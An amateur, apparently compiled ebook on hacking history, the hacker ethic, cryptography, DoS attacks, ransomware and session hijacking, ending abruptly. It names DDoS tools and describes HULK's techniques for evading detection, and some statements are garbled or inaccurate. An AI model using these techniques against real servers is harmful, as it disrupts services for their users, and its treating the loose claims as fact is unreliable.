LEGIONS UNLEASHED: THE TESTAMENT OF ANARCHISTS




INTRODUCTION
The vast majority of systems around today are internet based systems. Over the years, following the improvements predicted under Moore's Law, computer hardware has continued to become both cheaper and faster. This has also led to software become ever more capable and cheaper too. However, this capability has brought with it ever more complexity. Complexity can result in more unintended weaknesses being created, often due to a lack of understanding of how to configure systems properly.
 
Many of theses weaknesses and vulnerabilities are well known - witness the work of the OWASP foundation on identifying and mitigating against sometimes simple, yet effective attacks. Witness too, how on reading the security breach reports produced annually by many companies, we see how these same attacks continue to be successful, year on year. Rather worryingly, we see the time between breach and discovery averaging out to very unacceptable times. In 2012, it was an average of 6 months. While in the following years, it dropped, by 2016, it had risen again to an average of 200 days. Not very comforting.
This would suggest a considerable lack of attention being paid by many companies. Many of these breaches are well understood, yet are often neglected, meaning many companies are not helping themselves here.

Ethical hacking, which goes hand in hand with penetration testing, is an essential step that companies should be engaging in order to find out how resilient their systems are to attack. It is not enough to set up a web based system and expect everything to run perfectly in a secure way. That is just not going to happen. The first requirement is to actually test your own systems, as any competent hacker would. Start by using all the known vulnerabilities to see how far the ethical hacker can get towards compromising the system. If the system is resilient to such attack, that is a great start, but a great many companies fail at this first hurdle, as the security breach reports continue to bear out.
The next stage is the more difficult stage to carry out, and that involves trying other means to compromise the system. This is where bad actors have an edge, in that there are a great many of them who simply try a huge range of activities to see what will break, and once they develop a new vulnerability, they share the details with many others.

At the very least, a company should use ethical hacking and penetration testing to ensure all the known vulnerabilities are properly secured. If they do not have the skills or expertise to carry out ongoing ethical hacking and penetration testing, they should contract out the work to competent outside agancies, and they should ensure they implement an effective monitoring system to ensure they can detect security breaches as they happen, together with a system of ensuring they can retain the full forensic trail - usually one of the primary targets of the bad actor who compromises a system, in order to cover their trail.
 
Source codes are framework and endoskeletons of all digital blood. They are the atomic particles of all firmwares and softwares. Source codes form the fortress of all computer security defence,graphics expansitivity and functional indices of a computer system.
The word hacking is synonymous with breaches, unauthorized entry or access or computer intrusion or unauthorized exploration of roof and utility tunnel spaces. A

Hacker is a computer expert with advanced technical knowledge, and any activity within the computer programmer subculture is referred to as Hacker culture. A security hacker breaches defenses in a computer system.

A computer hacker is any skilled computer expert who uses their technical knowledge to overcome a problem, this term may also refer to a security hacker who uses bugs or exploits to break into computer systems, while a script kiddies are people who break into computers using programs written by others, with very little knowledge about the way they work

An adherent of the technology and programming subculture is an hacker, such will always uphold the tenet of ethics and principle, while a cracker is someone who is able to subvert computer security for malicious or non-malicious purposes.
However, the general or mainstream usage of the term hacker in today’s media mostly refers to computer criminals, this misinformation started since the 1980s. Terms such as “black hat”, “white hat” and “gray hat” developed when laws against breaking into computers came into effects, to distinguish criminal activities from those activities which were legal. Sometimes, “hacker” is simply synonymous with “geek”; “A true hacker is not a group person. He’s a person who loves to stay up all night, he and the machine in a love-hate relationship.
SECURITY HACKING
Security hackers are people involved with circumvention of computer security. Among security hackers, there are several types, including:
ü White hat hacker who work to keep data safe from other hackers by finding system vulnerabilities that can be mitigated. White hats are usually employed by the target system’s owner and are typically paid for their work. Their work is not illegal because it is done with the system owner’s consent.
ü Black hats or crackers are hackers with malicious intentions. They often steal, exploit, and sell data, and are usually motivated by personal gain. Their work is usually illegal, they tries to make profits and not entirely to vandalize. They can also find exploits for system vulnerabilities and sell the fix to the system owner or sell the exploit to other black hat hackers, who in turn use it to steal information or gain royalties
ü Grey hats are those who hack for fun or to troll. They may both fix and exploit vulnerabilities, but usually not for financial gain. Their work can still be malicious, if done without the target system owner’s consent, and grey hats are usually associated with black hat hackers.

The hackers subculture may focus on creating new and improved existing infrastructure especially the software environment they work with  or the general act of circumventing security measures, with the effective use of the knowledge ( which can be to report and help fixing the security bugs, or exploitation reasons) being only rather secondary
The pandemic of security hacking started as early as 1903 when the magician and inventor Nevil Maskelyne disrupted the public demonstration of wireless  telegraphy technology by sending insulting Morse code messages through the presenter’s projector. Men like Marian Rejewski, Alan Turing, Joe Engressia (a blind boy who discovered the gateway to phreaking a mobile telecommunication frequency), Ian Murphy (Captain Zap), Robert T. Morris, Jr. (who created the Morris Worm in 1988),Kevin Mitnick, Onel de Guzman(A Pilipino who scripted the “ILOVEYOU” worm also known as VBS/Loveletter and Love Bug worm in 2000), Jonathan James, Dmitry Sklyarov…the list will remain endless.

THE CONSCIENCE OF A HACKER (HACKER’S MANISFESTO)
The Conscience of a Hacker is a small essay written January 8, 1986 by a computer security hacker who went by the handle/pseudonym of The Mentor (Loyd Blankenship), who belonged to the 2nd generation of hacker group Legion of Doom.
It was written after the author’s arrest, and first published in the underground hacker ezine Phrack, it is considered a cornerstone of hacker culture, the Manisfesto acts as a guideline to hackers across the globe, especially those new to the field. It serves as an ethical foundation for hacking, and asserts that there is a point to hacking that supersedes selfish desires to exploit or harm other people, and that technology should be used to expand our horizons and try to keep the world free.
 
=-=The following was written shortly after my arrest... \/\The Conscience of a Hacker/\ by +++The Mentor+++ Written on January 8, 1986=-=
        Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"…Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world...Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me...Or feels threatened by me...Or thinks I'm a smart ass...Or doesn't like teaching and shouldn't be here...Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found.  "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...Damn kid. Tying up the phone line again. They're all alike...You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
 +++The Mentor+++
Hacking is not simply the ability to locate bugs, nor is it the ability to write shell-scripts and execute shellcode, it is more than being a competent programmer or skilled software engineer, it is of both skill and mindset. It is not a fixed pattern or system, but a framework of being able to adapt and to think outside of the box, to come up with new tricks and knowledge and to be precise, but to be able to react quickly and the ability to create and execute plans well. The cycle follows this pattern, from the mentality to the programming, from the usage, to the creation of tools and scripts and execution.
However, it is important that hackers maintain ethics, because the abuse of skill in the hacking world can cause harm to others. Remember: it is almost impossible to gain respect at the expense of others

The Initial or Pre-existing Ethic
Back when computers just started to reach universities and colleges and students had access to use computer systems, curious users began to show a certain disregard for the pre-existing  rules. These users would enter sections of the system without authorization, gaining access to privileged or elevated resources. With no Internet and no copies of Hacking Exposed or Security Warrior to assist them, they had to figure out how to enter the systems on their own.
Although these young students represented the first hackers, they had no malicious intent; they simply wanted knowledge, information, a deeper understanding of the systems which they had access to. To justify and eventually distinguish their efforts, the hacking community developed The Hacker Ethic as a core part of their subculture. The Hacker Ethic states two basic principles:
 
-Do no damage.
-Make no one pay for your actions.
 
These two principles fall hand in hand. The original hackers had an intention to learn about the systems they invaded, not to destroy them or steal valuable confidential information. They wanted to know how
they worked, their flaws, their strengths, interesting functions of their design. They had no authorization; at the time, they made up for this by making a point of neither interfering with anyone's work nor costing anyone any money in the process of exploring the system. Unfortunately this mantra does not provide a fully effective cover for your actions. Even disregarding the legal ramifications, such as the Computer Fraud and Abuse Act of 1986, your actions will have devastating unintentional consequences if not carefully controlled. Robert Morris created the Morris Worm to gauge the size of the Internet harmlessly; unfortunately, it loaded down the systems it infected due to exponential re-infection, causing tens of millions of dollars of financial damage.
You must always remember to carefully consider the short and long term impact of your actions on any system.
 
Modern or Today’s Ethic…
Today we need to add one more rule to The Hacker Ethic, a rule that we should have added long ago. The Morris Worm illustrates why this rule exists, even beyond legality.
-Always get permission ahead of time.
-Please remember to always get permission before acting. Your actions cause a major disruption to the targets you attack.  Networks become slow, servers crash or hang, and you create spurious log entries.  Any institution with a useful IA sector will notice your attack and panic, believing you to have malicious intent; they will invariably expend resources searching for back doors and trying to determine what confidential information you stole. All of this, even if you don’t get caught, demands that you acquire permission ahead of time.  You always have authorization to hack into servers you own. In all other cases, you need to ask the owners of the machines for authorization; you can even ask them to pay for it, selling your services as penetration tests and giving them a comprehensive outline of their network’s vulnerabilities and proper mitigation steps to improve their security.  As long as you have permission ahead of time, and you remember the first two rules of The Hacker Ethic, you can do as you please with the network and the affected machines.

The Prerequisite Knowledge
Some background knowledge that is required to begin learning are as follows:
1. Knowledge of a computer's inner hardwares and what they do, like the CPU and RAM chips
2. Programming experience. A good knowledge of C, C+, Phython, Java etc
3. A desire to learn new things and lots of motivation and resilence to keep going.

H#ASHING: THE CONCEPT OF DIGITAL GIBBERISH.
Encryption in modern times is achieved by using algorithms that have a key to encrypt and decrypt information. These keys convert the messages and data into "digital gibberish" through encryption and then return them to the original form through decryption. In general, the longer the key is, the more difficult it is to crack the encrypted code. This holds true because deciphering an encrypted message by brute force would require the attacker to try every possible key. To put this in context, each binary unit of information, or bit, has a value of 0 or 1. An 8-bit key would then have 256 or 28 possible keys.
A 56-bit key would have 256, or 72 quadrillion, possible keys to try and decipher the message. With modern technology, cyphers using keys with these lengths are becoming easier to decipher. DES, an early US Government approved cypher, has an effective key length of 56 bits, and test messages using that cypher have been broken by brute force key search.
However, as technology advances, so does the quality of encryption. Since World War II, one of the most notable advances in the study of cryptography is the introduction of the asymmetric key cyphers (sometimes termed public-key cyphers). These are algorithms which use two mathematically related keys for encryption of the same message. Some of these algorithms permit publication of one of the keys, due to it being extremely difficult to determine one key simply from knowledge of the other.
 
Beginning around 1990, the use of the Internet for commercial purposes and the introduction of commercial transactions over the Internet called for a widespread standard for encryption. Before the introduction of the Advanced Encryption Standard (AES), information sent over the Internet, such as financial data, was encrypted if at all, most commonly using the Data Encryption Standard (DES). This had been approved by NBS (a US Government agency) for its security, after public call for, and a competition among, candidates for such a cypher algorithm. DES was approved for a short period, but saw extended use due to complex wrangles over the use by the public of high quality encryption.
DES was finally replaced by the AES after another public competition organized by the NBS successor agency, NIST. Around the late 1990s to early 2000s, the use of public-key algorithms became a more common approach for encryption, and soon a hybrid of the two schemes became the most accepted way for e-commerce operations to proceed. Additionally, the creation of a new protocol known as the Secure Socket Layer, or SSL, led the way for online transactions to take place.

Transactions ranging from purchasing goods to online bill pay and banking used SSL. Furthermore, as wireless Internet connections became more common among households, the need for encryption grew, as a level of security was needed in these everyday situations.
 

HISTORY OF CRYPTOGRAPHIC HASHING
Claude Shannon
Claude E. Shannon is considered by many to be the father of mathematical cryptography. Shannon worked for several years at Bell Labs, and during his time there, he produced an article entitled "A mathematical theory of cryptography". This article was written in 1945 and eventually was published in the Bell System Technical Journal in 1949.
It is commonly accepted that this paper was the starting point for development of modern cryptography. Shannon was inspired during the war to address "the problems of cryptography because secrecy systems furnish an interesting application of communication theory". Shannon identified the two main goals of cryptography: secrecy and authenticity. His focus was on exploring secrecy and thirty-five years later, G.J. Simmons would address the issue of authenticity.
Shannon wrote a further article entitled "A mathematical theory of communication" which highlights one of the most significant aspects of his work: cryptography's transition from art to science. In his works, Shannon described the two basic types of systems for secrecy. The first are those designed with the intent to protect against hackers and attackers who have infinite resources with which to decode a message (theoretical secrecy, now unconditional security), and the second are those designed to protect against hackers and attacks with finite resources with which to decode a message (practical secrecy, now computational security). Most of Shannon's work focused around theoretical secrecy; here, Shannon introduced a definition for the "unbreakability" of a cipher.
If a cipher was determined "unbreakable", it was considered to have "perfect secrecy". In proving "perfect secrecy", Shannon determined that this could only be obtained with a secret key whose length given in binary digits was greater than or equal to the number of bits contained in the information being encrypted. Furthermore, Shannon developed the "unicity distance", defined as the "amount of plaintext that… determines the secret key.”
Shannon's work influenced further cryptography research in the 1970s, as the public-key cryptography developers, M. E. Hellman and W. Diffie cited Shannon's research as a major influence. His work also impacted modern designs of secret-key ciphers. At the end of Shannon's work with cryptography, progress slowed until Hellman and Diffie introduced their paper involving "public-key cryptography".

An encryption standard
The mid-1970s saw two major public (i.e., non-secret) advances. First was the publication of the draft Data Encryption Standard in the U.S. Federal Register on 17 March 1975. The proposed DES cipher was submitted by a research group at IBM, at the invitation of the National Bureau of Standards (now NIST), in an effort to develop secure electronic communication facilities for businesses such as banks and other large financial organizations. After advice and modification by the NSA, acting behind the scenes, it was adopted and published as a Federal Information Processing Standard Publication in 1977 (currently at FIPS 46-3). DES was the first publicly accessible cipher to be 'blessed' by a national agency such as the NSA. The release of its specification by NBS stimulated an explosion of public and academic interest in cryptography.
The aging DES was officially replaced by the Advanced Encryption Standard (AES) in 2001 when NIST announced FIPS 197. After an open competition, NIST selected Rijndael, submitted by two Belgian cryptographers, to be the AES. DES, and more secure variants of it (such as Triple DES), are still used today, having been incorporated into many national and organizational standards. However, its 56-bit key-size has been shown to be insufficient to guard against brute force attacks (one such attack, undertaken by the cyber civil-rights group Electronic Frontier Foundation in 1997, succeeded in 56 hours.)
As a result, use of straight DES encryption is now without doubt insecure for use in new cryptosystem designs, and messages protected by older cryptosystems using DES, and indeed all messages sent since 1976 using DES, are also at risk. Regardless of DES' inherent quality, the DES key size (56-bits) was thought to be too small by some even in 1976, perhaps most publicly by Whitfield Diffie. There was suspicion that government organizations even then had sufficient computing power to break DES messages; clearly others have achieved this capability.

Public key
The second development, in 1976, was perhaps even more important, for it fundamentally changed the way cryptosystems might work. This was the publication of the paper New Directions in Cryptography by Whitfield Diffie and Martin Hellman. It introduced a radically new method of distributing cryptographic keys, which went far toward solving one of the fundamental problems of cryptography, key distribution, and has become known as Diffie–Hellman key exchange. The article also stimulated the almost immediate public development of a new class of enciphering algorithms, the asymmetric key algorithms.
Prior to that time, all useful modern encryption algorithms had been symmetric key algorithms, in which the same cryptographic key is used with the underlying algorithm by both the sender and the recipient, who must both keep it secret. All of the electromechanical machines used in World War II were of this logical class, as were the Caesar and Atbash ciphers and essentially all cipher systems throughout history. The 'key' for a code is, of course, the codebook, which must likewise be distributed and kept secret, and so shares most of the same problems in practice.
Of necessity, the key in every such system had to be exchanged between the communicating parties in some secure way prior to any use of the system (the term usually used is 'via a secure channel') such as a trustworthy courier with a briefcase handcuffed to a wrist, or face-to-face contact, or a loyal carrier pigeon. This requirement is never trivial and very rapidly becomes unmanageable as the number of participants increases, or when secure channels aren't available for key exchange, or when, as is sensible cryptographic practice, keys are frequently changed. In particular, if messages are meant to be secure from other users, a separate key is required for each possible pair of users. A system of this kind is known as a secret key, or symmetric key cryptosystem. D-H key exchange (and succeeding improvements and variants) made operation of these systems much easier, and more secure, than had ever been possible before in all of history.
In contrast, asymmetric key encryption uses a pair of mathematically related keys, each of which decrypts the encryption performed using the other. Some, but not all, of these algorithms have the additional property that one of the paired keys cannot be deduced from the other by any known method other than trial and error. An algorithm of this kind is known as a public key or asymmetric key system. Using such an algorithm, only one key pair is needed per user. By designating one key of the pair as private (always secret), and the other as public (often widely available), no secure channel is needed for key exchange. So long as the private key stays secret, the public key can be widely known for a very long time without compromising security, making it safe to reuse the same key pair indefinitely.
For two users of an asymmetric key algorithm to communicate securely over an insecure channel, each user will need to know their own public and private keys as well as the other user's public key. Take this basic scenario: Alice and Bob each have a pair of keys they've been using for years with many other users. At the start of their message, they exchange public keys, unencrypted over an insecure line. Alice then encrypts a message using her private key, and then re-encrypts that result using Bob's public key. The double-encrypted message is then sent as digital data over a wire from Alice to Bob. Bob receives the bit stream and decrypts it using his own private key, and then decrypts that bit stream using Alice's public key. If the final result is recognizable as a message, Bob can be confident that the message actually came from someone who knows Alice's private key (presumably actually her if she's been careful with her private key), and that anyone eavesdropping on the channel will need Bob's private key in order to understand the message.

Asymmetric algorithms rely for their effectiveness on a class of problems in mathematics called one-way functions, which require relatively little computational power to execute, but vast amounts of power to reverse, if reversal is possible at all. A classic example of a one-way function is multiplication of very large prime numbers. It's fairly quick to multiply two large primes, but very difficult to find the factors of the product of two large primes. Because of the mathematics of one-way functions, most possible keys are bad choices as cryptographic keys; only a small fraction of the possible keys of a given length are suitable, and so asymmetric algorithms require very long keys to reach the same level of security provided by relatively shorter symmetric keys. The need to both generate the key pairs, and perform the encryption/decryption operations make asymmetric algorithms computationally expensive, compared to most symmetric algorithms. Since symmetric algorithms can often use any sequence of (random, or at least unpredictable) bits as a key, a disposable session key can be quickly generated for short-term use.

Consequently, it is common practice to use a long asymmetric key to exchange a disposable, much shorter (but just as strong) symmetric key. The slower asymmetric algorithm securely sends a symmetric session key, and the faster symmetric algorithm takes over for the remainder of the message.
Asymmetric key cryptography, Diffie–Hellman key exchange, and the best known of the public key / private key algorithms (i.e., what is usually called the RSA algorithm), all seem to have been independently developed at a UK intelligence agency before the public announcement by Diffie and Hellman in 1976. GCHQ has released documents claiming they had developed public key cryptography before the publication of Diffie and Hellman's paper.[citation needed] Various classified papers were written at GCHQ during the 1960s and 1970s which eventually led to schemes essentially identical to RSA encryption and to Diffie–Hellman key exchange in 1973 and 1974. Some of these have now been published, and the inventors (James H. Ellis, Clifford Cocks, and Malcolm Williamson) have made public (some of) their work.

Hashing
Hashing is a common technique used in cryptography to encode information quickly using typical algorithms. Generally, an algorithm is applied to a string of text, and the resulting string becomes the "hash value". This creates a "digital fingerprint" of the message, as the specific hash value is used to identify a specific message. The output from the algorithm is also referred to as a "message digest" or a "check sum". Hashing is good for determining if information has been changed in transmission. If the hash value is different upon reception than upon sending, there is evidence the message has been altered. Once the algorithm has been applied to the data to be hashed, the hash function produces a fixed-length output. Essentially, anything passed through the hash function should resolve to the same length output as anything else passed through the same hash function. It is important to note that hashing is not the same as encrypting. Hashing is a one-way operation that is used to transform data into the compressed message digest. Additionally, the integrity of the message can be measured with hashing. Conversely, encryption is a two-way operation that is used to transform plaintext into cipher-text and then vice versa. In encryption, the confidentiality of a message is guaranteed.
 
Hash functions can be used to verify digital signatures, so that when signing documents via the Internet, the signature is applied to one particular individual. Much like a hand-written signature, these signatures are verified by assigning their exact hash code to a person. Furthermore, hashing is applied to passwords for computer systems. Hashing for passwords began with the UNIX operating system. A user on the system would first create a password. That password would be hashed, using an algorithm or key, and then stored in a password file. This is still prominent today, as web applications that require passwords will often hash user's passwords and store them in a database.

Cryptography Politics
The public developments of the 1970s broke the near monopoly on high quality cryptography held by government organizations (see S Levy's Crypto for a journalistic account of some of the policy controversy of the time in the US). For the first time ever, those outside government organizations had access to cryptography not readily breakable by anyone (including governments). Considerable controversy, and conflict, both public and private, began more or less immediately, sometimes called the crypto wars. They have not yet subsided. In many countries, for example, export of cryptography is subject to restrictions. Until 1996 export from the U.S. of cryptography using keys longer than 40 bits (too small to be very secure against a knowledgeable attacker) was sharply limited.
As recently as 2004, former FBI Director Louis Freeh, testifying before the 9/11 Commission, called for new laws against public use of encryption.
One of the most significant people favoring strong encryption for public use was Phil Zimmermann. He wrote and then in 1991 released PGP (Pretty Good Privacy), a very high quality crypto system. He distributed a freeware version of PGP when he felt threatened by legislation then under consideration by the US Government that would require backdoors to be included in all cryptographic products developed within the US. His system was released worldwide shortly after he released it in the US, and that began a long criminal investigation of him by the US Government Justice Department for the alleged violation of export restrictions. The Justice Department eventually dropped its case against Zimmermann, and the freeware distribution of PGP has continued around the world. PGP even eventually became an open Internet standard (RFC 2440 or OpenPGP).

Modern cryptanalysis
While modern ciphers like AES and the higher quality asymmetric ciphers are widely considered unbreakable, poor designs and implementations are still sometimes adopted and there have been important cryptanalytic breaks of deployed crypto systems in recent years. Notable examples of broken crypto designs include the first Wi-Fi encryption scheme WEP, the Content Scrambling System used for encrypting and controlling DVD use, the A5/1 and A5/2 ciphers used in GSM cell phones, and the CRYPTO1 cipher used in the widely deployed MIFARE Classic smart cards from NXP Semiconductors, a spun off division of Philips Electronics. All of these are symmetric ciphers. Thus far, not one of the mathematical ideas underlying public key cryptography has been proven to be 'unbreakable', and so some future mathematical analysis advance might render systems relying on them insecure. While few informed observers foresee such a breakthrough, the key size recommended for security as best practice keeps increasing as increased computing power required for breaking codes becomes cheaper and more available. Quantum computers, if ever constructed with enough capacity, could break existing public key algorithms and efforts are underway to develop and standardize post-quantum cryptography.

Even without breaking encryption in the traditional sense, side-channel attacks can be mounted that exploit information gained from the way a computer system is implemented, such as cache memory usage, timing information, power consumption, electromagnetic leaks or even sounds emitted. Newer cryptographic algorithms are being developed that make such attacks more difficult.

DENIAL OF SERVICE ATTACK
What is a denial-of-service attack?
A denial-of-service (DoS) attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. Services affected may include email, websites, online accounts (e.g., banking), or other services that rely on the affected computer or network. A denial-of-service condition is accomplished by flooding the targeted host or network with traffic until the target cannot respond or simply crashes, preventing access for legitimate users. DoS attacks can cost an organization both time and money while their resources and services are inaccessible.

What are common denial-of-service attacks?
There are many different methods for carrying out a DoS attack. The most common method of attack occurs when an attacker floods a network server with traffic. In this type of DoS attack, the attacker sends several requests to the target server, overloading it with traffic. These service requests are illegitimate and have fabricated return addresses, which mislead the server when it tries to authenticate the requestor. As the junk requests are processed constantly, the server is overwhelmed, which causes a DoS condition to legitimate requestors.
In a Smurf Attack, the attacker sends Internet Control Message Protocol broadcast packets to a number of hosts with a spoofed source Internet Protocol (IP) address that belongs to the target machine. The recipients of these spoofed packets will then respond, and the targeted host will be flooded with those responses.
A SYN flood occurs when an attacker sends a request to connect to the target server but does not complete the connection through what is known as a three-way handshake—a method used in a Transmission Control Protocol (TCP)/IP network to create a connection between a local host/client and server. The incomplete handshake leaves the connected port in an occupied status and unavailable for further requests. An attacker will continue to send requests, saturating all open ports, so that legitimate users cannot connect.
Individual networks may be affected by DoS attacks without being directly targeted. If the network’s internet service provider (ISP) or cloud service provider has been targeted and attacked, the network will also experience a loss of service.

What is a distributed denial-of-service attack?
A distributed denial-of-service (DDoS) attack occurs when multiple machines are operating together to attack one target. DDoS attackers often leverage the use of a botnet—a group of hijacked internet-connected devices to carry out large scale attacks. Attackers take advantage of security vulnerabilities or device weaknesses to control numerous devices using command and control software. Once in control, an attacker can command their botnet to conduct DDoS on a target. In this case, the infected devices are also victims of the attack.
Botnets—made up of compromised devices—may also be rented out to other potential attackers. Often the botnet is made available to “attack-for-hire” services, which allow unskilled users to launch DDoS attacks.
DDoS allows for exponentially more requests to be sent to the target, therefore increasing the attack power. It also increases the difficulty of attribution, as the true source of the attack is harder to identify.
DDoS attacks have increased in magnitude as more and more devices come online through the Internet of Things (IoT).  IoT devices often use default passwords and do not have sound security postures, making them vulnerable to compromise and exploitation. Infection of IoT devices often goes unnoticed by users, and an attacker could easily compromise hundreds of thousands of these devices to conduct a high-scale attack without the device owners’ knowledge.

How do you avoid being part of the problem?
While there is no way to completely avoid becoming a target of a DoS or DDoS attack, there are proactive steps administrators can take to reduce the effects of an attack on their network:
a.       Enroll in a DoS protection service that detects abnormal traffic flows and redirects traffic away from your network. The DoS traffic is filtered out, and clean traffic is passed on to your network.
b.      Create a disaster recovery plan to ensure successful and efficient communication, mitigation, and recovery in the event of an attack.
c.       It is also important to take steps to strengthen the security posture of all of your internet-connected devices in order to prevent them from being compromised.
d.      Install and maintain antivirus software.
e.      Install a firewall and configure it to restrict traffic coming into and leaving your computer.
f.        Evaluate security settings and follow good security practices in order to minimalize the access other people have to your information, as well as manage unwanted traffic .

How do you know if an attack is happening?
Symptoms of a DoS attack can resemble non-malicious availability issues, such as technical problems with a particular network or a system administrator performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:
a.       Unusually slow network performance (opening files or accessing websites).
b.      Unavailability of a particular website, or an inability to access any website.
The best way to detect and identify a DoS attack would be via network traffic monitoring and analysis. Network traffic can be monitored via a firewall or intrusion detection system. An administrator may even set up rules that create an alert upon the detection of an anomalous traffic load and identify the source of the traffic or drops network packets that meet a certain criteria.

What do you do if you think you are experiencing an attack?
If you think you or your business is experiencing a DoS or DDoS attack, it is important to contact the appropriate technical professionals for assistance. Contact your network administrator to confirm whether the service outage is due to maintenance or an in-house network issue. Network administrators can also monitor network traffic to confirm the presence of an attack, identify the source, and mitigate the situation by applying firewall rules and possibly rerouting traffic through a DoS protection service.
Contact your ISP to ask if there is an outage on their end or even if their network is the target of the attack and you are an indirect victim. They may be able to advise you on an appropriate course of action. In the case of an attack, do not lose sight of the other hosts, assets, or services residing on your network. Many attackers conduct DoS or DDoS attacks to deflect attention away from their intended target and use the opportunity to conduct secondary attacks on other services within your network.
Although a successful DoS attack can mean bad news, multiple open-source tools are available for detecting your vulnerability to Denial of Service (DoS) attacks.These include:

1.    Hping3
Hping3, a Kali Linux open-source packet crafting tool, allows the type of packet to be set (TCP, UDP, and ICMP), as well as the speed at which to send them. Hping3 enables the user to finely tune the speed of the packets being sent using a microsecond interval. This Active Network Smashing Tool simulates DoS attacks specifically and allows for the creation of HTTP GET and POST requests for web application attacks.
Hping itself is a security tool that is also used for the following: Firewall testing, Advanced port scanning, Network testing, using different protocols, TOS, fragmentation, Manual path MTU discovery, Advanced traceroute, under all supported protocols, Remote OS fingerprinting, Remote uptime guessing and TCP/IP stacks auditing

2.    HULK
HULK (Http Unbearable Load King) is a web server DDoS attack tool created by security researcher Barry Shteiman to bypass caching and hit the server’s direct resource pool with a high volume of “unique and obfuscated traffic.” HULK is written in Python but has been ported to other languages such as Golang.
HULK was created on the premise that many DDoS tools use an easily observable pattern, thus making detection and mitigation an easier task. HULK creates a unique value for each request being sent. Specific techniques used include the following, as listed as on their website:
a.       Source client obfuscation – For every request that is constructed, the User Agent is a random value out of a known list.
b.      Reference forgery – The referrer that points at the request is obfuscated and points into either the host itself or a pre-listed website.
c.       Stickiness – Use a standard Http command to ask the server to maintain open connections by using Keep-Alive with a variable time window.
d.      no-cache – A server that is not behind a dedicated caching service presents a unique page.
e.      Unique URL transformation – Custom parameters are randomized and attached to each request, rendering it unique and causing the server to process the response.
HULK also has a “safe” option to kill the process and control the attack in a lab setting. Some firewalls, including Palo Alto, have specific settings to defend against HULK attacks, making this method a weaker option as time progresses and more vendors adopt these rules.

3.    GoldenEye
GoldenEye is an open-source, HTTP  DDoS attack testing tool based on HULK. This tool sends keep-alive packets to a given host, creating the illusion of a flood of active users connecting—and most importantly staying connected—to a targeted host. GoldenEye should be used for stress testing a given application or web service.

RANSOMEWARES
What Is Ransomware?
Ransomware is defined as vicious malware that locks users out of their devices or blocks access to files until a sum of money or ransom is paid. Ransomware attacks cause downtime, data loss, possible intellectual property theft, and in certain industries an attack is considered a data breach.
September 2013 is when ransomware went pro. It typically gets installed on a user’s workstation (PC or Mac) using a social engineering attack where the user gets tricked in clicking on a phishing link or opening an attachment. Once the malware is on the machine, it starts to encrypt all data files it can find on the machine itself and on any network shares the PC has access to.
Next, when a user wants to access one of these files they are blocked, and the system admin who gets alerted by the user finds two files in the directory that indicate the files are taken ransom, and how to pay the ransom to decrypt the files. New strains and variants come and go as new cyber mafias muscle into the "business". Techniques the cybercriminals are using are constantly evolving to get past traditional defenses. Some major strains are WannaCry, GandCrab, Phobos and Cerber. This is a very successful criminal business model. Annual ransomware-induced costs are projected to exceed $20 billion by 2021, according to a Cybersecurity Ventures report. Once files are encrypted, the only way to get them back is to restore a backup or pay the ransom.
The emergence of new strains has slowed down, but ransomware has gone nuclear and is getting much more sophisticated. In the early days, hackers mostly targeted consumers, and it would encrypt immediately upon executing. Later on, ransomware gangs realized they would make a lot more money targeting businesses. At first they would spread like a worm through organizations, collecting credentials and encrypting files along the way. Threat actors are now a lot more intelligent in their approach. Once they've gotten in, the malware 'dials home' so that the hacker can do a full analysis on which data is most valuable to their victim, how much they can realistically ask for, and what can they encrypt that will get them a payday sooner.

Timeline of Ransomeware
1989

The first ever ransomware virus was created in 1989 by Harvard-trained evolutionary biologist Joseph L. Popp (now known as the 'father of ransomware'). It was called the AIDS Trojan, also known as the PC Cyborg. Popp sent 20,000 infected diskettes labeled “AIDS Information – Introductory Diskettes” to attendees of the World Health Organization’s international AIDS conference in Stockholm. The disks contained malicious code that hid file directories, locked file names and demanded victims send $189 to a PO Box in Panama if they wanted their data back. The AIDS Trojan was “generation one” ransomware malware and relatively easy to overcome. The Trojan used simple symmetric cryptography and tools were soon available to decrypt the file names. But the AIDS Trojan set the scene for what was to come.

CACHED SESSION HIJACKING
In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookie used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). After successfully stealing appropriate session cookies an adversary might use the Pass the Cookie technique to perform session hijacking.
A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.
